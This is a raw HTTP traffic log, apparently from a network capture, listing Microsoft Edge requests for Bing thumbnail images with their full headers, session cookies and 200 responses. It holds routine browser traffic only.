cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2049
cache-control: public, max-age=1209520
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51285
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.r5TsDIuc-wua94BPlWVPewHaE7&w=80&h=80&c=1&vt=10&bgcl=5d12c6&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.r5TsDIuc-wua94BPlWVPewHaE7&w=80&h=80&c=1&vt=10&bgcl=5d12c6&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 991
cache-control: public, max-age=1209595
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5128d
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.fbf23055-0c6e-4012-a6ac-b9efa1cee4d7&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.fbf23055-0c6e-4012-a6ac-b9efa1cee4d7&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2280
x-check-cacheable: YES
cache-control: public, max-age=1787178
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5128e
GET

https://th.bing.com/th?id=OIP.dzR7HgqYVgWIx6zlvY6D7wHaDQ&w=80&h=80&c=1&vt=10&bgcl=73076a&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.dzR7HgqYVgWIx6zlvY6D7wHaDQ&w=80&h=80&c=1&vt=10&bgcl=73076a&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9740
x-check-cacheable: YES
cache-control: public, max-age=153801
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51299
GET

https://th.bing.com/th?id=ODL.032549a578d2ec61f9e3386bc626d011&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=13.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODL.032549a578d2ec61f9e3386bc626d011&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2210
x-check-cacheable: YES
cache-control: public, max-age=2592000
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51253
GET

https://th.bing.com/th?id=OVP.ekQWSDFiQU1NFa6T_RXlIgHgFo&w=608&h=342&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.ekQWSDFiQU1NFa6T_RXlIgHgFo&w=608&h=342&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2191
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51295
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OVP.eq6IvB1OchM55kZ53gzG7QHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.eq6IvB1OchM55kZ53gzG7QHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7993
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:04:18 GMT
